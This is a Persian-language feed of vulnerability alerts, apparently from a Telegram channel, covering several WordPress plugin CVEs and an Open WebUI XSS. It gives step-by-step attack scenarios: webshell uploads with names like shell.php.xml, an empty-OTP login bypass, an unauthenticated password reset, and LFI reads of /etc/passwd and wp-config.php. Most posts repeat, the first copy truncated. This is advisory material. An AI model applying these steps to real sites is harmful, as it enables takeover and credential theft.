🚨 New Vulnerability Alert: CVE-2025-13543
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-13543
خلاصه گزارش فنی برای مدیران وبسایتهای وردپرسی
---
🐞 شرح آسیبپذیری:
آسیبپذیری از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه
علت اصلی این آسیبپذیری، عدم اعتبارسنجی صحیح نوع فایلهای آپلود شده در توابع کلاس
💥 تأثیر:
موفقیت در بهرهبرداری از این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) شود. این بدترین سناریوی ممکن برای یک وبسایت است و به مهاجم اجازه میدهد:
🔻 کنترل کامل وبسایت و سرور را در دست بگیرد.
🔻 به پایگاه داده و اطلاعات حساس کاربران دسترسی پیدا کند.
🔻 وبسایت را تخریب کرده یا از آن برای انتشار بدافزار استفاده کند.
🔻 یک در پشتی (Backdoor) برای دسترسیهای آتی بر روی سرور نصب کند.
🎭 سناریو:
یک مهاجم سناریوی زیر را دنبال میکند:
1. ابتدا با استفاده از ابزارهای اسکن، وبسایتهایی را که از نسخه آسیبپذیر افزونه
2. در وبسایت هدف، یک حساب کاربری با پایینترین سطح دسترسی ممکن (مانند Subscriber) ثبتنام میکند. بسیاری از سایتها اجازه ثبتنام عمومی را میدهند.
3. سپس با استفاده از قابلیت آپلود فایل در این افزونه، به جای یک فایل تصویر مجاز، یک فایل مخرب (مثلاً یک وبشل با پسوند
4. در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده از طریق مرورگر، کد مخرب خود را بر روی سرور اجرا کرده و کنترل کامل آن را به دست میآورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-13543
خلاصه گزارش فنی برای مدیران وبسایتهای وردپرسی
---
🐞 شرح آسیبپذیری:
آسیبپذیری از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه
PostGallery برای وردپرس شناسایی شده است. این ضعف امنیتی در تمامی نسخههای این افزونه تا نسخه 1.12.5 (و خود این نسخه) وجود دارد.علت اصلی این آسیبپذیری، عدم اعتبارسنجی صحیح نوع فایلهای آپلود شده در توابع کلاس
PostGalleryUploader است. این نقص به مهاجمان احرازهویتشده با حداقل سطح دسترسی مشترک (Subscriber) اجازه میدهد تا فایلهای دلخواه و مخرب خود (مانند وبشلها) را بر روی سرور سایت قربانی بارگذاری کنند.💥 تأثیر:
موفقیت در بهرهبرداری از این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) شود. این بدترین سناریوی ممکن برای یک وبسایت است و به مهاجم اجازه میدهد:
🔻 کنترل کامل وبسایت و سرور را در دست بگیرد.
🔻 به پایگاه داده و اطلاعات حساس کاربران دسترسی پیدا کند.
🔻 وبسایت را تخریب کرده یا از آن برای انتشار بدافزار استفاده کند.
🔻 یک در پشتی (Backdoor) برای دسترسیهای آتی بر روی سرور نصب کند.
🎭 سناریو:
یک مهاجم سناریوی زیر را دنبال میکند:
1. ابتدا با استفاده از ابزارهای اسکن، وبسایتهایی را که از نسخه آسیبپذیر افزونه
PostGallery استفاده میکنند، شناسایی میکند.2. در وبسایت هدف، یک حساب کاربری با پایینترین سطح دسترسی ممکن (مانند Subscriber) ثبتنام میکند. بسیاری از سایتها اجازه ثبتنام عمومی را میدهند.
3. سپس با استفاده از قابلیت آپلود فایل در این افزونه، به جای یک فایل تصویر مجاز، یک فایل مخرب (مثلاً یک وبشل با پسوند
.php) را آپلود میکند. به دلیل ضعف در اعتبارسنجی، سیستم این فایل را میپذیرد.4. در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده از طریق مرورگر، کد مخرب خود را بر روی سرور اجرا کرده و کنترل کامل آن را به دست میآورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-65959
🟠 Risk Level: HIGH (Score: 8.7)
تحلیل آسیبپذیری Stored XSS در پلتفرم Open WebUI
---
Vulnerability Description:
یک آسیبپذیری از نوع Stored Cross-Site Scripting (XSS) در پلتفرم هوش مصنوعی Open WebUI و در نسخههای قبل از
این ضعف امنیتی در عملکرد دانلود یادداشتها به صورت فایل PDF وجود دارد. مهاجم میتواند با بارگذاری یک فایل Markdown که حاوی تگهای SVG مخرب است، کدهای جاوا اسکریپت دلخواه را در مرورگر قربانی اجرا کند. آسیبپذیری زمانی فعال میشود که کاربر قربانی، یادداشت آلوده را به عنوان فایل PDF دانلود میکند.
Impact:
مهمترین پیامد این آسیبپذیری، سرقت توکنهای نشست (Session Tokens) کاربران است. این امر به مهاجم اجازه میدهد تا نشست کاربر قربانی را ربوده و به حساب کاربری او، اعم از کاربر عادی یا مدیر سیستم، دسترسی کامل پیدا کند.
پس از در اختیار گرفتن حساب کاربری، مهاجم قادر است به اطلاعات خصوصی دسترسی یابد، از طرف کاربر اقدامات مخربی انجام دهد و در صورت دسترسی به حساب مدیر، کنترل کامل پلتفرم را به دست بگیرد.
Scenario:
سناریوی حمله به شرح زیر است:
۱. مهاجم یک فایل Markdown با محتوای مخرب ایجاد میکند. این فایل شامل یک تگ SVG است که درون آن کد جاوا اسکریپت برای سرقت توکنها تعبیه شده است.
۲. مهاجم وارد حساب کاربری خود در Open WebUI شده و فایل مخرب را در بخش یادداشتها (Notes) وارد (import) میکند.
۳. مهاجم این یادداشت را با یک کاربر دیگر (قربانی) به اشتراک میگذارد یا او را ترغیب به مشاهده و دانلود آن میکند.
۴. قربانی، پس از ورود به حساب خود، یادداشت آلوده را باز کرده و روی گزینه دانلود به صورت PDF کلیک میکند.
۵. در لحظه پردازش برای ایجاد PDF، کد جاوا اسکریپت مخرب در مرورگر قربانی اجرا شده، توکن نشست او را سرقت کرده و به سرور تحت کنترل مهاجم ارسال میکند.
۶. مهاجم با استفاده از توکن سرقت شده، به حساب کاربری قربانی وارد شده و کنترل آن را در دست میگیرد.
---
توصیه میشود کاربران این پلتفرم در اسرع وقت به نسخه
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.7)
تحلیل آسیبپذیری Stored XSS در پلتفرم Open WebUI
CVE-2025-65959---
Vulnerability Description:
یک آسیبپذیری از نوع Stored Cross-Site Scripting (XSS) در پلتفرم هوش مصنوعی Open WebUI و در نسخههای قبل از
0.6.37 شناسایی شده است.این ضعف امنیتی در عملکرد دانلود یادداشتها به صورت فایل PDF وجود دارد. مهاجم میتواند با بارگذاری یک فایل Markdown که حاوی تگهای SVG مخرب است، کدهای جاوا اسکریپت دلخواه را در مرورگر قربانی اجرا کند. آسیبپذیری زمانی فعال میشود که کاربر قربانی، یادداشت آلوده را به عنوان فایل PDF دانلود میکند.
Impact:
مهمترین پیامد این آسیبپذیری، سرقت توکنهای نشست (Session Tokens) کاربران است. این امر به مهاجم اجازه میدهد تا نشست کاربر قربانی را ربوده و به حساب کاربری او، اعم از کاربر عادی یا مدیر سیستم، دسترسی کامل پیدا کند.
پس از در اختیار گرفتن حساب کاربری، مهاجم قادر است به اطلاعات خصوصی دسترسی یابد، از طرف کاربر اقدامات مخربی انجام دهد و در صورت دسترسی به حساب مدیر، کنترل کامل پلتفرم را به دست بگیرد.
Scenario:
سناریوی حمله به شرح زیر است:
۱. مهاجم یک فایل Markdown با محتوای مخرب ایجاد میکند. این فایل شامل یک تگ SVG است که درون آن کد جاوا اسکریپت برای سرقت توکنها تعبیه شده است.
۲. مهاجم وارد حساب کاربری خود در Open WebUI شده و فایل مخرب را در بخش یادداشتها (Notes) وارد (import) میکند.
۳. مهاجم این یادداشت را با یک کاربر دیگر (قربانی) به اشتراک میگذارد یا او را ترغیب به مشاهده و دانلود آن میکند.
۴. قربانی، پس از ورود به حساب خود، یادداشت آلوده را باز کرده و روی گزینه دانلود به صورت PDF کلیک میکند.
۵. در لحظه پردازش برای ایجاد PDF، کد جاوا اسکریپت مخرب در مرورگر قربانی اجرا شده، توکن نشست او را سرقت کرده و به سرور تحت کنترل مهاجم ارسال میکند.
۶. مهاجم با استفاده از توکن سرقت شده، به حساب کاربری قربانی وارد شده و کنترل آن را در دست میگیرد.
---
توصیه میشود کاربران این پلتفرم در اسرع وقت به نسخه
0.6.37 یا بالاتر بهروزرسانی کنند تا از این خطر در امان بمانند.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13066
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری:
---
شرح آسیبپذیری:
افزونه
تأثیر:
موفقیت در بهرهبرداری از این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) بر روی سرور شود. این امر به مهاجم اجازه میدهد تا کنترل کامل وبسایت را در دست بگیرد، به اطلاعات حساس (مانند اطلاعات کاربران و پایگاه داده) دسترسی پیدا کند، بدافزار یا درهای پشتی (Backdoor) نصب کند و از سرور برای انجام حملات دیگر سوءاستفاده نماید.
سناریوی حمله:
یک مهاجم که حداقل سطح دسترسی نویسنده (Author) را در سایت وردپرسی هدف به دست آورده است، یک فایل شل (Web Shell) مخرب با نامی مانند
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری:
CVE-2025-13066---
شرح آسیبپذیری:
افزونه
Demo Importer Plus برای وردپرس در تمامی نسخههای 2.0.6 و پایینتر، دارای یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) است. این ضعف امنیتی به دلیل عدم اعتبارسنجی کافی و صحیح نوع فایلهای ورودی با پسوند WXR (فرمت استاندارد درونریزی محتوا در وردپرس) به وجود آمده است. مهاجم میتواند با ساخت یک فایل با پسوند دوگانه (مانند backdoor.php.xml)، مکانیزم امنیتی افزونه را فریب داده و فایل مخرب خود را با موفقیت بر روی سرور آپلود کند.تأثیر:
موفقیت در بهرهبرداری از این آسیبپذیری میتواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) بر روی سرور شود. این امر به مهاجم اجازه میدهد تا کنترل کامل وبسایت را در دست بگیرد، به اطلاعات حساس (مانند اطلاعات کاربران و پایگاه داده) دسترسی پیدا کند، بدافزار یا درهای پشتی (Backdoor) نصب کند و از سرور برای انجام حملات دیگر سوءاستفاده نماید.
سناریوی حمله:
یک مهاجم که حداقل سطح دسترسی نویسنده (Author) را در سایت وردپرسی هدف به دست آورده است، یک فایل شل (Web Shell) مخرب با نامی مانند
shell.php.xml ایجاد میکند. سپس با استفاده از قابلیت درونریزی در افزونه Demo Importer Plus، این فایل را آپلود میکند. افزونه به دلیل ضعف در اعتبارسنجی، پسوند .xml را تشخیص داده و آپلود را مجاز میداند، در حالی که وب سرور فایل را به عنوان یک اسکریپت PHP شناسایی و پردازش میکند. در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده، کد مخرب خود را اجرا کرده و کنترل سرور را به دست میگیرد.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13313
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل حرفهای آسیبپذیری با شناسه CVE-2025-13313
افزونه CRM Memberships برای وردپرس
---
شرح آسیبپذیری: 📝
آسیبپذیری شناسایی شده با کد
ضعف اصلی ناشی از نبود کنترلهای لازم برای احراز هویت و بررسی مجوز دسترسی در تابع ایجکس (AJAX) به نام
تأثیر: 💥
یک مهاجم بدون نیاز به حساب کاربری، میتواند از این آسیبپذیری برای بازنشانی رمز عبور هر کاربری، از جمله کاربران با سطح دسترسی مدیر کل (Administrator)، سوءاستفاده کند.
با تغییر رمز عبور یک مدیر، مهاجم میتواند کنترل کامل وبسایت را به دست آورد. این امر میتواند منجر به سرقت اطلاعات حساس کاربران، تغییر محتوای سایت (Defacement)، نصب بدافزار و یا از کار انداختن کامل وبسایت شود.
سناریوی حمله: 🎯
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم ابتدا یک درخواست به اندپوینت عمومی و ناامن
۲. سپس، مهاجم از میان ایمیلهای به دست آمده، یک حساب کاربری با دسترسی بالا (مانند مدیر) را به عنوان هدف انتخاب میکند.
۳. مهاجم درخواستی را به تابع آسیبپذیر
۴. در نهایت، مهاجم با استفاده از ایمیل کاربر و رمز عبور جدید، با موفقیت به عنوان آن کاربر وارد وبسایت شده و کنترل کامل حساب کاربری و وبسایت را در اختیار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل حرفهای آسیبپذیری با شناسه CVE-2025-13313
افزونه CRM Memberships برای وردپرس
---
شرح آسیبپذیری: 📝
آسیبپذیری شناسایی شده با کد
CVE-2025-13313 در افزونه CRM Memberships برای وردپرس، از نوع افزایش سطح دسترسی (Privilege Escalation) است. این مشکل در تمامی نسخههای افزونه تا نسخه 2.5 (و خود این نسخه) وجود دارد.ضعف اصلی ناشی از نبود کنترلهای لازم برای احراز هویت و بررسی مجوز دسترسی در تابع ایجکس (AJAX) به نام
ntzcrm_changepassword است. این نقص به مهاجمان احراز هویت نشده اجازه میدهد تا رمز عبور هر کاربری را در وبسایت بازنشانی کنند. علاوه بر این، یک نقطه ضعف دیگر در اندپوینت ntzcrm_get_users وجود دارد که به مهاجمان اجازه میدهد بدون نیاز به لاگین، لیست ایمیل کاربران سایت را استخراج کرده و فرآیند حمله را تسهیل کنند.تأثیر: 💥
یک مهاجم بدون نیاز به حساب کاربری، میتواند از این آسیبپذیری برای بازنشانی رمز عبور هر کاربری، از جمله کاربران با سطح دسترسی مدیر کل (Administrator)، سوءاستفاده کند.
با تغییر رمز عبور یک مدیر، مهاجم میتواند کنترل کامل وبسایت را به دست آورد. این امر میتواند منجر به سرقت اطلاعات حساس کاربران، تغییر محتوای سایت (Defacement)، نصب بدافزار و یا از کار انداختن کامل وبسایت شود.
سناریوی حمله: 🎯
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم ابتدا یک درخواست به اندپوینت عمومی و ناامن
ntzcrm_get_users ارسال میکند. در پاسخ، لیستی از آدرسهای ایمیل کاربران ثبتنام شده در سایت را به دست میآورد.۲. سپس، مهاجم از میان ایمیلهای به دست آمده، یک حساب کاربری با دسترسی بالا (مانند مدیر) را به عنوان هدف انتخاب میکند.
۳. مهاجم درخواستی را به تابع آسیبپذیر
ntzcrm_changepassword ارسال میکند. در این درخواست، ایمیل کاربر هدف و یک رمز عبور جدید (که توسط خود مهاجم تعیین شده) را وارد میکند. به دلیل نبود سازوکار امنیتی، سیستم این درخواست غیرمجاز را پذیرفته و رمز عبور کاربر را تغییر میدهد.۴. در نهایت، مهاجم با استفاده از ایمیل کاربر و رمز عبور جدید، با موفقیت به عنوان آن کاربر وارد وبسایت شده و کنترل کامل حساب کاربری و وبسایت را در اختیار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12153
🟠 Risk Level: HIGH (Score: 8.8)
📝 شرح آسیبپذیری:
آسیبپذیری با شناسه
💥 میزان تأثیر:
این آسیبپذیری به یک مهاجم احرازهویتشده (با سطح دسترسی حداقل
🎭 سناریوی حمله:
۱. مهاجم با یک حساب کاربری با سطح دسترسی
۲. با استفاده از قابلیت آسیبپذیر افزونه، مهاجم به جای یک فایل تصویر، یک فایل مخرب با پسوند
۳. به دلیل نبود مکانیزم اعتبارسنجی، افزونه فایل مخرب را بدون بررسی نوع آن پذیرفته و بر روی سرور ذخیره میکند.
۴. در نهایت، مهاجم با دسترسی مستقیم به URL فایل آپلود شده، کد مخرب خود را بر روی سرور اجرا کرده و میتواند کنترل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
📝 شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-12153 در افزونه Featured Image via URL برای وردپرس شناسایی شده است. این آسیبپذیری از نوع آپلود فایل دلخواه (Arbitrary File Upload) بوده و به دلیل عدم وجود اعتبارسنجی صحیح برای نوع فایلهای آپلود شده در تمامی نسخهها تا نسخه 0.1 (و خود این نسخه) به وجود آمده است.💥 میزان تأثیر:
این آسیبپذیری به یک مهاجم احرازهویتشده (با سطح دسترسی حداقل
Contributor) اجازه میدهد تا فایلهای دلخواه، مانند وبشل (Web Shell) یا اسکریپتهای مخرب دیگر، را بر روی سرور سایت آسیبپذیر آپلود کند. موفقیت در بهرهبرداری از این ضعف امنیتی میتواند منجر به اجرای کد از راه دور (Remote Code Execution) شده و در نهایت، کنترل کامل وبسایت، سرقت اطلاعات حساس و یا استفاده از سرور برای حملات بیشتر را برای مهاجم فراهم آورد.🎭 سناریوی حمله:
۱. مهاجم با یک حساب کاربری با سطح دسترسی
Contributor یا بالاتر وارد سایت وردپرسی هدف میشود.۲. با استفاده از قابلیت آسیبپذیر افزونه، مهاجم به جای یک فایل تصویر، یک فایل مخرب با پسوند
.php را برای آپلود انتخاب میکند.۳. به دلیل نبود مکانیزم اعتبارسنجی، افزونه فایل مخرب را بدون بررسی نوع آن پذیرفته و بر روی سرور ذخیره میکند.
۴. در نهایت، مهاجم با دسترسی مستقیم به URL فایل آپلود شده، کد مخرب خود را بر روی سرور اجرا کرده و میتواند کنترل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12181
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-12181
📜 توضیحات آسیبپذیری:
آسیبپذیری از نوع "آپلود فایل دلخواه" (Arbitrary File Upload) در افزونه
منشأ این مشکل، عدم اعتبارسنجی صحیح نوع فایل در تابع
💥 تأثیرات:
مهمترین و خطرناکترین پیامد این آسیبپذیری، امکان "اجرای کد از راه دور" (Remote Code Execution - RCE) است. با آپلود یک وبشل (Web Shell)، مهاجم میتواند کنترل کامل سرور را به دست بگیرد.
دیگر تأثیرات بالقوه عبارتند از:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال اسپم)
- از دسترس خارج شدن کامل وبسایت
🎭 سناریو حمله:
یک سناریوی محتمل برای بهرهبرداری از این آسیبپذیری به شرح زیر است:
۱. مهاجم از طریق روشهایی مانند فیشینگ یا حدس زدن رمز عبور ضعیف، به یک حساب کاربری با سطح دسترسی "نویسنده" در سایت وردپرسی دسترسی پیدا میکند.
۲. مهاجم وارد پیشخوان وردپرس شده و با استفاده از قابلیتهای افزونه
۳. به دلیل عدم وجود مکانیزم بررسی نوع فایل، افزونه این فایل مخرب را پذیرفته و بر روی سرور ذخیره میکند.
۴. در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده در مرورگر (مثلاً:
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-12181
📜 توضیحات آسیبپذیری:
آسیبپذیری از نوع "آپلود فایل دلخواه" (Arbitrary File Upload) در افزونه
ContentStudio برای وردپرس شناسایی شده است. این ضعف امنیتی در تمام نسخههای 1.3.7 و پایینتر وجود دارد.منشأ این مشکل، عدم اعتبارسنجی صحیح نوع فایل در تابع
cstu_update_post() است. این نقص به مهاجمان احرازهویتشده با سطح دسترسی "نویسنده" (Author) یا بالاتر اجازه میدهد تا فایلهایی با پسوندهای خطرناک (مانند .php) را بر روی سرور سایت هدف آپلود کنند.💥 تأثیرات:
مهمترین و خطرناکترین پیامد این آسیبپذیری، امکان "اجرای کد از راه دور" (Remote Code Execution - RCE) است. با آپلود یک وبشل (Web Shell)، مهاجم میتواند کنترل کامل سرور را به دست بگیرد.
دیگر تأثیرات بالقوه عبارتند از:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال اسپم)
- از دسترس خارج شدن کامل وبسایت
🎭 سناریو حمله:
یک سناریوی محتمل برای بهرهبرداری از این آسیبپذیری به شرح زیر است:
۱. مهاجم از طریق روشهایی مانند فیشینگ یا حدس زدن رمز عبور ضعیف، به یک حساب کاربری با سطح دسترسی "نویسنده" در سایت وردپرسی دسترسی پیدا میکند.
۲. مهاجم وارد پیشخوان وردپرس شده و با استفاده از قابلیتهای افزونه
ContentStudio، یک فایل PHP مخرب (مثلاً با نام shell.php) را به جای یک فایل مجاز (مانند تصویر) آپلود میکند.۳. به دلیل عدم وجود مکانیزم بررسی نوع فایل، افزونه این فایل مخرب را پذیرفته و بر روی سرور ذخیره میکند.
۴. در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده در مرورگر (مثلاً:
www.example.com/wp-content/uploads/shell.php)، کد مخرب را اجرا کرده و یک شل دستوری روی سرور به دست میآورد و کنترل کامل آن را در اختیار میگیرد.---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12374
🔴 Risk Level: CRITICAL (Score: 9.8)
✒️ توضیحات آسیبپذیری:
آسیبپذیری با شناسه
منشأ اصلی این آسیبپذیری، عدم اعتبارسنجی صحیح در تابع
💥 تأثیرات و پیامدها:
موفقیت در بهرهبرداری از این آسیبپذیری به یک مهاجم احراز هویت نشده اجازه میدهد تا به حساب کاربری هر فردی که دارای ایمیل تأیید شده در سیستم است، دسترسی پیدا کند.
خطرناکترین پیامد این حمله، امکان ورود به حساب کاربری با سطح دسترسی مدیر کل (Administrator) است. در این حالت، مهاجم کنترل کامل وبسایت را به دست میآورد و میتواند اقداماتی مخرب مانند سرقت اطلاعات حساس کاربران، نصب بدافزار، تغییر محتوای سایت (Defacement) و یا حذف کامل اطلاعات را انجام دهد.
🎭 سناریوی حمله:
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم یک وبسایت را که از نسخه آسیبپذیر افزونه استفاده میکند، شناسایی میکند.
۲. مهاجم ایمیل یا نام کاربری یک کاربر با سطح دسترسی بالا (مثلاً مدیر سایت) را که از قبل میداند یا حدس میزند، در فرم ورود وارد میکند.
۳. در مرحله بعد که سیستم درخواست وارد کردن رمز یکبار مصرف (OTP) را دارد، مهاجم فیلد مربوطه را به صورت خالی رها کرده و فرم را ارسال میکند.
۴. به دلیل وجود آسیبپذیری در منطق برنامه، سیستم این درخواست را به عنوان یک ورود موفقیتآمیز پردازش کرده و مهاجم به عنوان کاربر قربانی وارد پنل مدیریت وبسایت میشود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
✒️ توضیحات آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-12374 از نوع دور زدن احراز هویت (Authentication Bypass) در افزونه User Verification وردپرس شناسایی شده است. این ضعف امنیتی تمامی نسخههای افزونه تا نسخه 2.0.39 را تحت تأثیر قرار میدهد.منشأ اصلی این آسیبپذیری، عدم اعتبارسنجی صحیح در تابع
user_verification_form_wrap_process_otpLogin است. این تابع پیش از مقایسه رمز یکبار مصرف (OTP) وارد شده توسط کاربر، بررسی نمیکند که آیا اصلاً یک OTP معتبر برای آن کاربر تولید و ارسال شده است یا خیر. این نقص به یک مهاجم غیرمجاز اجازه میدهد تا با ارسال یک مقدار OTP خالی، فرآیند تأیید هویت را با موفقیت دور بزند.💥 تأثیرات و پیامدها:
موفقیت در بهرهبرداری از این آسیبپذیری به یک مهاجم احراز هویت نشده اجازه میدهد تا به حساب کاربری هر فردی که دارای ایمیل تأیید شده در سیستم است، دسترسی پیدا کند.
خطرناکترین پیامد این حمله، امکان ورود به حساب کاربری با سطح دسترسی مدیر کل (Administrator) است. در این حالت، مهاجم کنترل کامل وبسایت را به دست میآورد و میتواند اقداماتی مخرب مانند سرقت اطلاعات حساس کاربران، نصب بدافزار، تغییر محتوای سایت (Defacement) و یا حذف کامل اطلاعات را انجام دهد.
🎭 سناریوی حمله:
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم یک وبسایت را که از نسخه آسیبپذیر افزونه استفاده میکند، شناسایی میکند.
۲. مهاجم ایمیل یا نام کاربری یک کاربر با سطح دسترسی بالا (مثلاً مدیر سایت) را که از قبل میداند یا حدس میزند، در فرم ورود وارد میکند.
۳. در مرحله بعد که سیستم درخواست وارد کردن رمز یکبار مصرف (OTP) را دارد، مهاجم فیلد مربوطه را به صورت خالی رها کرده و فرم را ارسال میکند.
۴. به دلیل وجود آسیبپذیری در منطق برنامه، سیستم این درخواست را به عنوان یک ورود موفقیتآمیز پردازش کرده و مهاجم به عنوان کاربر قربانی وارد پنل مدیریت وبسایت میشود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12851
🟠 Risk Level: HIGH (Score: 8.1)
📝 توضیحات آسیبپذیری:
آسیبپذیری با شناسه
این ضعف امنیتی تمامی نسخههای این پلاگین تا نسخه 3.6.32 (و خود این نسخه) را تحت تاثیر قرار میدهد. مشکل اصلی در پارامتر
💥 تاثیرات:
موفقیت در بهرهبرداری از این آسیبپذیری میتواند منجر به نتایج خطرناکی شود، از جمله:
- اجرای کد از راه دور (RCE): اگر مهاجم بتواند فایلی حاوی کدهای PHP (حتی یک فایل تصویر دستکاریشده) را روی سرور آپلود کند، میتواند با فراخوانی آن از طریق این آسیبپذیری، کنترل کامل وبسایت را به دست بگیرد.
- سرقت اطلاعات حساس: مهاجم قادر به خواندن فایلهای حساس سرور خواهد بود، مانند فایل
- دور زدن کنترلهای دسترسی: این آسیبپذیری میتواند برای دور زدن مکانیزمهای امنیتی و دسترسی به بخشهای مدیریتی یا محدود شده استفاده شود.
🎭 سناریوی حمله:
یک مهاجم ابتدا یک وبسایت را که از نسخه آسیبپذیر پلاگین
در مرحله اول، مهاجم با ارسال یک درخواست دستکاریشده به پارامتر
در یک سناریوی پیشرفتهتر، مهاجم ابتدا یک فایل به ظاهر بیخطر (مانند یک تصویر آواتار) که حاوی کدهای مخرب PHP است را در قسمتی از وبسایت آپلود میکند. سپس با استفاده از همین آسیبپذیری LFI، مسیر آن فایل آپلود شده را در پارامتر
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.1)
📝 توضیحات آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-12851 از نوع گنجاندن فایل محلی یا Local File Inclusion (LFI) در پلاگین وردپرسی My auctions allegro شناسایی شده است.این ضعف امنیتی تمامی نسخههای این پلاگین تا نسخه 3.6.32 (و خود این نسخه) را تحت تاثیر قرار میدهد. مشکل اصلی در پارامتر
controller نهفته است که به مهاجمان بدون نیاز به احراز هویت اجازه میدهد تا فایلهای دلخواه موجود بر روی سرور را فراخوانی و محتوای آنها را اجرا کنند.💥 تاثیرات:
موفقیت در بهرهبرداری از این آسیبپذیری میتواند منجر به نتایج خطرناکی شود، از جمله:
- اجرای کد از راه دور (RCE): اگر مهاجم بتواند فایلی حاوی کدهای PHP (حتی یک فایل تصویر دستکاریشده) را روی سرور آپلود کند، میتواند با فراخوانی آن از طریق این آسیبپذیری، کنترل کامل وبسایت را به دست بگیرد.
- سرقت اطلاعات حساس: مهاجم قادر به خواندن فایلهای حساس سرور خواهد بود، مانند فایل
wp-config.php که حاوی اطلاعات اتصال به پایگاه داده است، یا سایر فایلهای سیستمی.- دور زدن کنترلهای دسترسی: این آسیبپذیری میتواند برای دور زدن مکانیزمهای امنیتی و دسترسی به بخشهای مدیریتی یا محدود شده استفاده شود.
🎭 سناریوی حمله:
یک مهاجم ابتدا یک وبسایت را که از نسخه آسیبپذیر پلاگین
My auctions allegro استفاده میکند، شناسایی میکند.در مرحله اول، مهاجم با ارسال یک درخواست دستکاریشده به پارامتر
controller، سعی میکند یک فایل حساس مانند /etc/passwd را بخواند تا اطلاعاتی درباره کاربران سیستمعامل سرور به دست آورد.در یک سناریوی پیشرفتهتر، مهاجم ابتدا یک فایل به ظاهر بیخطر (مانند یک تصویر آواتار) که حاوی کدهای مخرب PHP است را در قسمتی از وبسایت آپلود میکند. سپس با استفاده از همین آسیبپذیری LFI، مسیر آن فایل آپلود شده را در پارامتر
controller قرار داده و آن را فراخوانی میکند. این عمل باعث اجرای کدهای مخرب PHP و دستیابی به اجرای کد از راه دور (RCE) بر روی سرور هدف میشود.---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12879
